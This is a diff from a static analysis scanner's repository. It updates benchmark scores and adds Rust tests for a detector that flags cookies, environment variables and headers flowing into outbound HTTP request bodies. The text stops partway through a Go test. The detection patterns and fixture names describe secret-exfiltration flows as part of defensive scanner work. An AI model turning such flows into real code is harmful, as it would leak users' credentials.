"outcome_location_level": "FN",
"matched_rule_ids": [],
"unexpected_rule_ids": [
"taint-data-exfiltration (source 7:22)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-unsanitised-flow (source 7:22)"
"taint-data-exfiltration (source 7:22)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
@ -3358,13 +3473,17 @@
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3465,6 +3584,63 @@
"security_finding_count": 2,
"non_security_finding_count": 0
},
{
"case_id": "js-data_exfil-001",
"file": "javascript/data_exfil/exfil_fetch_cookie_body.js",
"language": "javascript",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:5)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 5:5)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "js-data_exfil-002",
"file": "javascript/data_exfil/exfil_fetch_external_destination.js",
"language": "javascript",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:5)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 5:5)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "js-data_exfil-003",
"file": "javascript/data_exfil/exfil_xhr_send_header.js",
"language": "javascript",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:5)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 5:5)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "js-destructure-sanitize-001",
"file": "javascript/safe/safe_object_destructure_sanitize.js",
@ -3558,13 +3734,17 @@
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3588,13 +3768,17 @@
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3678,13 +3862,17 @@
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3732,6 +3920,36 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "js-safe-data_exfil-001",
"file": "javascript/safe/safe_data_exfil_sanitizer_wrap.js",
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "js-safe-data_exfil-002",
"file": "javascript/safe/safe_data_exfil_user_input_echo.js",
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "js-safe-parseInt-001",
"file": "javascript/safe/safe_parseInt.js",
@ -3882,11 +4100,11 @@
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-unsanitised-flow (source 5:5)"
"cfg-unguarded-sink"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-unsanitised-flow (source 5:5)"
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
@ -4971,6 +5189,44 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "py-data_exfil-001",
"file": "python/data_exfil/exfil_requests_post_env_dict.py",
"language": "python",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 14:25)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 14:25)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "py-data_exfil-002",
"file": "python/data_exfil/exfil_httpx_async_post_env.py",
"language": "python",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 12:15)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 12:15)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "py-deser-001",
"file": "python/deser/deser_pickle.py",
@ -5228,6 +5484,21 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "py-safe-data_exfil-001",
"file": "python/safe/safe_data_exfil_user_input_echo.py",
"language": "python",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "py-safe-int-001",
"file": "python/safe/safe_int_cast.py",
@ -5425,6 +5696,25 @@
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "rb-data_exfil-001",
"file": "ruby/data_exfil/exfil_net_http_post_cookie.rb",
"language": "ruby",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 7:9)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 7:9)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "rb-interproc-001",
"file": "ruby/interprocedural/interproc_taint_propagation.rb",
@ -5504,6 +5794,21 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "rb-safe-data_exfil-001",
"file": "ruby/safe/safe_data_exfil_user_input_echo.rb",
"language": "ruby",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "rs-auth-001",
"file": "rust/auth/actix_scoped_write_missing.rs",
@ -6179,6 +6484,26 @@
"security_finding_count": 1,
"non_security_finding_count": 2
},
{
"case_id": "rs-data_exfil-001",
"file": "rust/data_exfil/exfil_reqwest_form_env.rs",
"language": "rust",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:18)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"rs.quality.unwrap",
"taint-data-exfiltration (source 5:18)"
],
"security_finding_count": 1,
"non_security_finding_count": 1
},
{
"case_id": "rs-deser-001",
"file": "rust/deser/deser_serde_yaml.rs",
@ -6717,15 +7042,15 @@
"vuln_class": "ssrf",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-unsanitised-flow (source 4:15)"
"outcome_rule_level": "FN",
"outcome_location_level": "FN",
"matched_rule_ids": [],
"unexpected_rule_ids": [
"taint-data-exfiltration (source 4:15)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"rs.quality.unwrap",
"taint-unsanitised-flow (source 4:15)"
"taint-data-exfiltration (source 4:15)"
],
"security_finding_count": 1,
"non_security_finding_count": 1
@ -7495,6 +7820,44 @@
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "ts-data_exfil-001",
"file": "typescript/data_exfil/exfil_fetch_cookie_body.ts",
"language": "typescript",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:5)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 5:5)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "ts-data_exfil-002",
"file": "typescript/data_exfil/exfil_fetch_header_body.ts",
"language": "typescript",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:5)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 5:5)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "ts-iife-closure-001",
"file": "typescript/safe/safe_iife_closure_sanitizer.ts",
@ -8043,13 +8406,15 @@
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"cfg-unguarded-sink",
"cfg-unguarded-sink"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"cfg-unguarded-sink",
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"security_finding_count": 2,
"non_security_finding_count": 0
},
{
@ -8193,29 +8558,29 @@
}
],
"aggregate_file_level": {
"tp": 225,
"fp": 1,
"tp": 238,
"fp": 7,
"fn_": 0,
"tn": 231,
"precision": 0.995575221238938,
"precision": 0.9714285714285714,
"recall": 1.0,
"f1": 0.9977827050997783
"f1": 0.9855072463768115
},
"aggregate_rule_level": {
"tp": 225,
"fp": 1,
"fn_": 0,
"tp": 236,
"fp": 7,
"fn_": 2,
"tn": 231,
"precision": 0.995575221238938,
"recall": 1.0,
"f1": 0.9977827050997783
"precision": 0.9711934156378601,
"recall": 0.9915966386554622,
"f1": 0.9812889812889812
},
"by_language": {
"c": {
"tp": 15,
"tp": 16,
"fp": 0,
"fn_": 0,
"tn": 15,
"tn": 16,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
@ -8230,31 +8595,31 @@
"f1": 1.0
},
"go": {
"tp": 25,
"tp": 26,
"fp": 1,
"fn_": 0,
"tn": 28,
"precision": 0.9615384615384616,
"tn": 29,
"precision": 0.9629629629629629,
"recall": 1.0,
"f1": 0.9803921568627451
"f1": 0.9811320754716981
},
"java": {
"tp": 19,
"fp": 0,
"fn_": 0,
"tn": 20,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
"tp": 20,
"fp": 2,
"fn_": 1,
"tn": 18,
"precision": 0.9090909090909091,
"recall": 0.9523809523809523,
"f1": 0.9302325581395349
},
"javascript": {
"tp": 19,
"fp": 0,
"tp": 22,
"fp": 4,
"fn_": 0,
"tn": 24,
"precision": 1.0,
"tn": 22,
"precision": 0.8461538461538461,
"recall": 1.0,
"f1": 1.0
"f1": 0.9166666666666666
},
"php": {
"tp": 18,
@ -8266,19 +8631,19 @@
"f1": 1.0
},
"python": {
"tp": 26,
"tp": 28,
"fp": 0,
"fn_": 0,
"tn": 28,
"tn": 29,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
},
"ruby": {
"tp": 19,
"tp": 20,
"fp": 0,
"fn_": 0,
"tn": 20,
"tn": 21,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
@ -8286,14 +8651,14 @@
"rust": {
"tp": 34,
"fp": 0,
"fn_": 0,
"fn_": 1,
"tn": 39,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
"recall": 0.9714285714285714,
"f1": 0.9855072463768115
},
"typescript": {
"tp": 32,
"tp": 34,
"fp": 0,
"fn_": 0,
"tn": 23,
@ -8357,6 +8722,15 @@
"recall": 1.0,
"f1": 1.0
},
"data_exfil": {
"tp": 13,
"fp": 0,
"fn_": 0,
"tn": 0,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
},
"deser": {
"tp": 8,
"fp": 0,
@ -8422,7 +8796,7 @@
},
"safe": {
"tp": 0,
"fp": 1,
"fp": 7,
"fn_": 0,
"tn": 231,
"precision": 0.0,
@ -8457,13 +8831,13 @@
"f1": 1.0
},
"ssrf": {
"tp": 28,
"tp": 26,
"fp": 0,
"fn_": 0,
"fn_": 2,
"tn": 0,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
"recall": 0.9285714285714286,
"f1": 0.962962962962963
},
"xss": {
"tp": 23,
@ -8477,31 +8851,31 @@
},
"by_confidence": {
">=High": {
"tp": 79,
"fp": 104,
"fn_": 146,
"tn": 128,
"precision": 0.43169398907103823,
"recall": 0.3511111111111111,
"f1": 0.3872549019607843
"tp": 74,
"fp": 106,
"fn_": 164,
"tn": 132,
"precision": 0.4111111111111111,
"recall": 0.31092436974789917,
"f1": 0.354066985645933
},
">=Low": {
"tp": 81,
"fp": 116,
"fn_": 144,
"tn": 116,
"precision": 0.41116751269035534,
"recall": 0.36,
"f1": 0.3838862559241706
"tp": 76,
"fp": 133,
"fn_": 162,
"tn": 105,
"precision": 0.36363636363636365,
"recall": 0.31932773109243695,
"f1": 0.34004474272930646
},
">=Medium": {
"tp": 81,
"fp": 116,
"fn_": 144,
"tn": 116,
"precision": 0.41116751269035534,
"recall": 0.36,
"f1": 0.3838862559241706
"tp": 76,
"fp": 123,
"fn_": 162,
"tn": 115,
"precision": 0.38190954773869346,
"recall": 0.31932773109243695,
"f1": 0.34782608695652173
}
}
}

View file

@ -697,6 +697,34 @@ fn benchmark_evaluation() {
"Rule-level F1 {:.3} fell below threshold 0.920 (baseline 0.970)",
rule.f1,
);
// ── Per-class floors ────────────────────────────────────────────
// DATA_EXFIL: 13 TP fixtures across 8 languages. Baseline at the
// 0.5.x → next-minor ship is P=1.000 R=1.000 F1=1.000 with 6 paired
// safe fixtures (sensitivity-gate, sanitizer-wrap) holding FP=0 on
// the data_exfil-class noise budget. Floor at 0.85 absorbs a one-
// case regression (~0.077 on 13 cases) while still catching a
// structural break. When you land a durable improvement, tighten
// this floor; do not relax it to paper over a regression.
if let Some(de) = results.by_vuln_class.get("data_exfil") {
assert!(
de.f1 >= 0.85,
"data_exfil rule-level F1 {:.3} fell below threshold 0.85 (baseline 1.000)",
de.f1,
);
assert!(
de.recall >= 0.85,
"data_exfil rule-level recall {:.3} fell below threshold 0.85 (baseline 1.000)",
de.recall,
);
assert!(
de.precision >= 0.85,
"data_exfil rule-level precision {:.3} fell below threshold 0.85 (baseline 1.000)",
de.precision,
);
} else {
panic!("data_exfil class missing from by_vuln_class breakdown");
}
}
// ── Confidence-threshold scoring ─────────────────────────────────────

View file

@ -0,0 +1,283 @@
//! Calibration tests for `taint-data-exfiltration` severity, confidence,
//! and rank scoring.
//!
//! These tests pin the calibration described in `docs/detectors.md` so any
//! future change to the scoring path either preserves the documented tier
//! relationships or breaks a test deliberately.
//!
//! What is checked here:
//!
//! * Cookie source + Confirmed symbolic verdict produces High severity
//! (cookies carry session / credential material and are treated as
//! Secret-tier for the leak class).
//! * Env source + Confirmed verdict produces High severity (same
//! reasoning, env vars carry credential material).
//! * Header / FileSystem / Database / CaughtException sources downgrade
//! to Medium severity even with a Confirmed verdict — they are
//! Sensitive but not credential-grade secrets.
//! * No symbolic verdict (or `Inconclusive` / `NotAttempted`) → Low
//! confidence (the instruction's "Inconclusive" tier; the
//! `Confidence` enum has no separate Inconclusive variant so it
//! floors to Low).
//! * Opaque body (Confirmed but with empty witness) → Medium
//! confidence; the abstract domain still produced a corroboration
//! signal even if the witness string is bare.
//! * `path_validated=true` drops a confidence tier (Medium → Low).
//! * On the same source, DATA_EXFIL ranks strictly below SSRF (the
//! taint-class bonus is +7 for data-exfil vs +10 for the generic
//! `taint-unsanitised-flow`).
use nyx_scanner::commands::scan::Diag;
use nyx_scanner::evidence::{
Confidence, Evidence, SpanEvidence, SymbolicVerdict, Verdict, compute_confidence,
};
use nyx_scanner::labels::SourceKind;
use nyx_scanner::patterns::{FindingCategory, Severity};
use nyx_scanner::rank::compute_attack_rank;
fn make_evidence(source_kind: SourceKind, verdict: Option<Verdict>) -> Evidence {
Evidence {
source: Some(SpanEvidence {
path: "src/leak.js".into(),
line: 1,
col: 1,
kind: "source".into(),
snippet: Some("req.cookies.session".into()),
}),
sink: Some(SpanEvidence {
path: "src/leak.js".into(),
line: 5,
col: 5,
kind: "sink".into(),
snippet: Some("fetch('/endpoint', { body: payload })".into()),
}),
source_kind: Some(source_kind),
hop_count: Some(1),
cap_specificity: Some(1),
symbolic: verdict.map(|v| SymbolicVerdict {
verdict: v,
constraints_checked: 0,
paths_explored: 1,
// For Confirmed cases use the strong-witness phrasing so the
// test exercises the same code path that real symex output
// takes (see `compute_taint_confidence` for the analogous
// witness-strength branch).
witness: matches!(v, Verdict::Confirmed)
.then(|| "tainted cookie flows to fetch body".into()),
interproc_call_chains: vec![],
cutoff_notes: vec![],
}),
..Default::default()
}
}
fn make_diag(
rule_id: &str,
severity: Severity,
source_kind: SourceKind,
verdict: Option<Verdict>,
path_validated: bool,
) -> Diag {
Diag {
path: "src/leak.js".into(),
line: 5,
col: 5,
severity,
id: rule_id.into(),
category: FindingCategory::Security,
path_validated,
guard_kind: if path_validated {
Some("Validation".into())
} else {
None
},
message: None,
labels: vec![],
confidence: None,
evidence: Some(make_evidence(source_kind, verdict)),
rank_score: None,
rank_reason: None,
suppressed: false,
suppression: None,
rollup: None,
finding_id: String::new(),
alternative_finding_ids: vec![],
}
}
// ── Calibration fixture 1: Cookie source, Confirmed verdict ─────────────
#[test]
fn cookie_source_with_confirmed_verdict_is_high_medium() {
// Severity: cookies are Secret-tier for DATA_EXFIL → High.
// Confidence: Confirmed verdict on a Sensitive source → Medium (the
// routing caps at Medium even with a strong witness; see
// `compute_data_exfil_confidence`).
let diag = make_diag(
"taint-data-exfiltration (source 1:1)",
Severity::High,
SourceKind::Cookie,
Some(Verdict::Confirmed),
false,
);
let confidence = compute_confidence(&diag);
assert_eq!(
confidence,
Confidence::Medium,
"Cookie + Confirmed → Medium (DATA_EXFIL cap), got {confidence:?}"
);
}
// ── Calibration fixture 2: Env source, Confirmed verdict ────────────────
#[test]
fn env_source_with_confirmed_verdict_is_high_medium() {
// Env vars carry credential / config material and are treated as
// Secret-tier alongside cookies.
let diag = make_diag(
"taint-data-exfiltration (source 1:1)",
Severity::High,
SourceKind::EnvironmentConfig,
Some(Verdict::Confirmed),
false,
);
let confidence = compute_confidence(&diag);
assert_eq!(
confidence,
Confidence::Medium,
"Env + Confirmed → Medium, got {confidence:?}"
);
}
// ── Calibration fixture 3: Header source, opaque body (no verdict) ──────
#[test]
fn header_source_without_symex_is_medium_low() {
// Header is Sensitive but not credential-grade; severity downgrades
// to Medium. No symbolic verdict → confidence Low (the "Inconclusive
// when no symex verdict" tier from the instruction).
let diag = make_diag(
"taint-data-exfiltration (source 1:1)",
Severity::Medium,
SourceKind::Header,
None,
false,
);
let confidence = compute_confidence(&diag);
assert_eq!(
confidence,
Confidence::Low,
"Header + no verdict → Low, got {confidence:?}"
);
}
// ── Calibration fixture 4: guarded path drops a tier ────────────────────
#[test]
fn guarded_path_drops_confidence_tier() {
// Cookie + Confirmed would normally yield Medium confidence; the
// path-validated flag drops it one step to Low. Without the guard
// the same diag must score Medium (asserted alongside to lock in
// the delta, not just the floor).
let unguarded = make_diag(
"taint-data-exfiltration (source 1:1)",
Severity::High,
SourceKind::Cookie,
Some(Verdict::Confirmed),
false,
);
let guarded = make_diag(
"taint-data-exfiltration (source 1:1)",
Severity::High,
SourceKind::Cookie,
Some(Verdict::Confirmed),
true,
);
assert_eq!(compute_confidence(&unguarded), Confidence::Medium);
assert_eq!(
compute_confidence(&guarded),
Confidence::Low,
"guarded DATA_EXFIL path must drop one confidence tier"
);
}
// ── Calibration fixture 5: ranking — DATA_EXFIL below SSRF on same source
#[test]
fn data_exfil_ranks_below_ssrf_on_same_source() {
// Cookie source flowing to `fetch` could fire either DATA_EXFIL (body
// arg) or SSRF / generic taint (URL arg). On the same severity tier
// SSRF must outrank DATA_EXFIL because the analysis-kind bonus is +10
// for `taint-unsanitised-flow` and +7 for `taint-data-exfiltration`.
let exfil = make_diag(
"taint-data-exfiltration (source 1:1)",
Severity::High,
SourceKind::Cookie,
Some(Verdict::Confirmed),
false,
);
let ssrf = make_diag(
"taint-unsanitised-flow (source 1:1)",
Severity::High,
SourceKind::Cookie,
Some(Verdict::Confirmed),
false,
);
let exfil_score = compute_attack_rank(&exfil).score;
let ssrf_score = compute_attack_rank(&ssrf).score;
assert!(
ssrf_score > exfil_score,
"SSRF score ({ssrf_score}) must outrank DATA_EXFIL score \
({exfil_score}) on the same source"
);
// The delta is exactly the analysis-kind bonus difference (+3) — pin
// it so accidental drift trips the test rather than silently moving
// both bonuses in lock-step.
assert!(
(ssrf_score - exfil_score - 3.0).abs() < 0.001,
"SSRF DATA_EXFIL should equal the analysis-kind bonus delta \
(+3); got {} ({} {})",
ssrf_score - exfil_score,
ssrf_score,
exfil_score,
);
}
// ── Calibration fixture 6: DATA_EXFIL above AST patterns ────────────────
#[test]
fn data_exfil_ranks_above_ast_pattern() {
// The instruction mandates DATA_EXFIL sit above informational AST
// patterns. Use a Medium DATA_EXFIL (header source) vs a Low AST
// pattern (the typical AST-only banned-API match) to lock the
// ordering in even at the weaker end of the DATA_EXFIL spectrum.
let medium_exfil = make_diag(
"taint-data-exfiltration (source 1:1)",
Severity::Medium,
SourceKind::Header,
Some(Verdict::Confirmed),
false,
);
let mut ast_pattern = make_diag(
"js.code_exec.eval",
Severity::Low,
SourceKind::Unknown,
None,
false,
);
// AST patterns don't carry taint evidence; clear it so the ranker
// takes the AST-only branch.
ast_pattern.evidence = None;
let exfil_score = compute_attack_rank(&medium_exfil).score;
let ast_score = compute_attack_rank(&ast_pattern).score;
assert!(
exfil_score > ast_score,
"DATA_EXFIL ({exfil_score}) must outrank AST pattern ({ast_score})"
);
}

View file

@ -0,0 +1,48 @@
//! Integration test for cross-file `param_to_gate_filters` propagation.
//!
//! A wrapper function whose two parameters target distinct gated-sink
//! classes on a single inner call (here, `fetch`'s SSRF gate on the URL
//! arg vs the DATA_EXFIL gate on the body arg) must keep cap attribution
//! per-position when callers reach it across a file boundary. Without
//! [`SsaFuncSummary::param_to_gate_filters`], the wrapper's summary
//! collapses both params into a single `SSRF | DATA_EXFIL` mask, and
//! every caller incorrectly fires both classes regardless of which
//! argument was tainted.
//!
//! The fixture pairs the wrapper with two callers, each tainting one
//! parameter and asserting only the cap class corresponding to that
//! parameter's gate fires.
mod common;
use common::{scan_fixture_dir, validate_expectations};
use nyx_scanner::utils::config::AnalysisMode;
use std::path::{Path, PathBuf};
fn fixture_path(name: &str) -> PathBuf {
Path::new(env!("CARGO_MANIFEST_DIR"))
.join("tests")
.join("fixtures")
.join(name)
}
#[test]
fn cross_file_data_exfil_split() {
let dir = fixture_path("cross_file_data_exfil_split");
let diags = scan_fixture_dir(&dir, AnalysisMode::Full);
validate_expectations(&diags, &dir);
}
/// Python parallel of the JS cross-file split fixture. A wrapper
/// `forward(url, body)` calls `requests.post(url, json=body)` so the URL
/// flows to the SSRF gate and the body kwarg flows to the DATA_EXFIL
/// gate. Per-position cap attribution must hold across the file
/// boundary: a caller that taints only the URL fires SSRF (no
/// DATA_EXFIL), and a caller that taints only the body with a Sensitive
/// source fires DATA_EXFIL (no SSRF).
#[test]
fn cross_file_python_data_exfil() {
let dir = fixture_path("cross_file_python_data_exfil");
let diags = scan_fixture_dir(&dir, AnalysisMode::Full);
validate_expectations(&diags, &dir);
}

View file

@ -0,0 +1,212 @@
//! Integration tests for the Go bindings of the `Cap::DATA_EXFIL`
//! detector class.
//!
//! Mirrors the JS `fetch_data_exfil_integration_tests` shape: a single
//! outbound HTTP callee carries an SSRF gate (URL flow) and a DATA_EXFIL
//! gate (body / payload flow), and per-position cap attribution must
//! keep a tainted URL from surfacing as data exfiltration and a tainted
//! body from surfacing as SSRF. Also validates the two-step
//! `http.NewRequest` → `http.DefaultClient.Do` idiom: NewRequest is
//! modeled as a body propagator (default arg → return propagation), so
//! body taint reaches the Do gate through the returned `*http.Request`.
mod common;
use common::{scan_fixture_dir, validate_expectations};
use nyx_scanner::commands::scan::Diag;
use nyx_scanner::utils::config::AnalysisMode;
use std::path::{Path, PathBuf};
fn go_fixture_dir() -> PathBuf {
PathBuf::from(env!("CARGO_MANIFEST_DIR"))
.join("tests")
.join("fixtures")
.join("go")
}
fn diags_for(file: &str) -> Vec<Diag> {
let dir = go_fixture_dir();
let all = scan_fixture_dir(&dir, AnalysisMode::Full);
all.into_iter().filter(|d| d.path.ends_with(file)).collect()
}
#[test]
fn http_post_body_data_exfil_emits_data_exfil_not_ssrf() {
let diags = diags_for("data_exfil_http_post.go");
let exfil = diags
.iter()
.filter(|d| d.id.starts_with("taint-data-exfiltration"))
.count();
let plain_taint = diags
.iter()
.filter(|d| d.id.starts_with("taint-unsanitised-flow"))
.count();
assert!(
exfil >= 1,
"expected at least one taint-data-exfiltration finding for cookie → http.Post body, got 0.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
assert_eq!(
plain_taint,
0,
"fixed-URL http.Post with tainted body must NOT emit SSRF \
(taint-unsanitised-flow), got {plain_taint}.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
}
#[test]
fn http_post_form_emits_data_exfil_not_ssrf() {
let diags = diags_for("data_exfil_post_form.go");
let exfil = diags
.iter()
.filter(|d| d.id.starts_with("taint-data-exfiltration"))
.count();
let plain_taint = diags
.iter()
.filter(|d| d.id.starts_with("taint-unsanitised-flow"))
.count();
assert!(
exfil >= 1,
"expected at least one taint-data-exfiltration finding for header → http.PostForm data, got 0.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
assert_eq!(
plain_taint,
0,
"fixed-URL http.PostForm with tainted form data must NOT emit SSRF, got {plain_taint}.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
}
#[test]
fn new_request_do_two_step_emits_data_exfil() {
// The two-step idiom: `req, _ := http.NewRequest(_, fixedURL, body);
// http.DefaultClient.Do(req)`. NewRequest is modeled as a body
// propagator (default arg → return) so the request value carries
// body taint into the DATA_EXFIL gate at Do. SSRF must not fire
// because the URL position at NewRequest is a hardcoded string.
let diags = diags_for("data_exfil_new_request_do.go");
let exfil = diags
.iter()
.filter(|d| d.id.starts_with("taint-data-exfiltration"))
.count();
let plain_taint = diags
.iter()
.filter(|d| d.id.starts_with("taint-unsanitised-flow"))
.count();
assert!(
exfil >= 1,
"expected at least one taint-data-exfiltration finding for cookie → NewRequest → Do, got 0.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
assert_eq!(
plain_taint,
0,
"two-step NewRequest → Do with hardcoded URL must NOT emit SSRF, got {plain_taint}.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
}
#[test]
fn map_assign_data_exfil_emits_through_url_values() {
// Container-taint DATA_EXFIL: cookies populate a `url.Values` map
// across multiple keys, then the map flows into `http.PostForm`'s
// form-data channel. The Elements heap slot must round-trip the
// cap from each `form.Set(k, v)` write to the sink-side load so
// DATA_EXFIL fires on the body channel even though `form` itself is
// not directly tainted by an Assign. SSRF must NOT fire because
// the destination URL is a hardcoded literal.
let diags = diags_for("data_exfil_map_assign.go");
let exfil = diags
.iter()
.filter(|d| d.id.starts_with("taint-data-exfiltration"))
.count();
let plain_taint = diags
.iter()
.filter(|d| d.id.starts_with("taint-unsanitised-flow"))
.count();
assert!(
exfil >= 1,
"expected at least one taint-data-exfiltration finding for map_assign cookies → http.PostForm, got 0.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
assert_eq!(
plain_taint,
0,
"fixed-URL http.PostForm with tainted map must NOT emit SSRF, got {plain_taint}.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
}
#[test]
fn ssrf_url_tainted_emits_ssrf_not_data_exfil() {
// Tainted query param flows into NewRequest's URL position with a
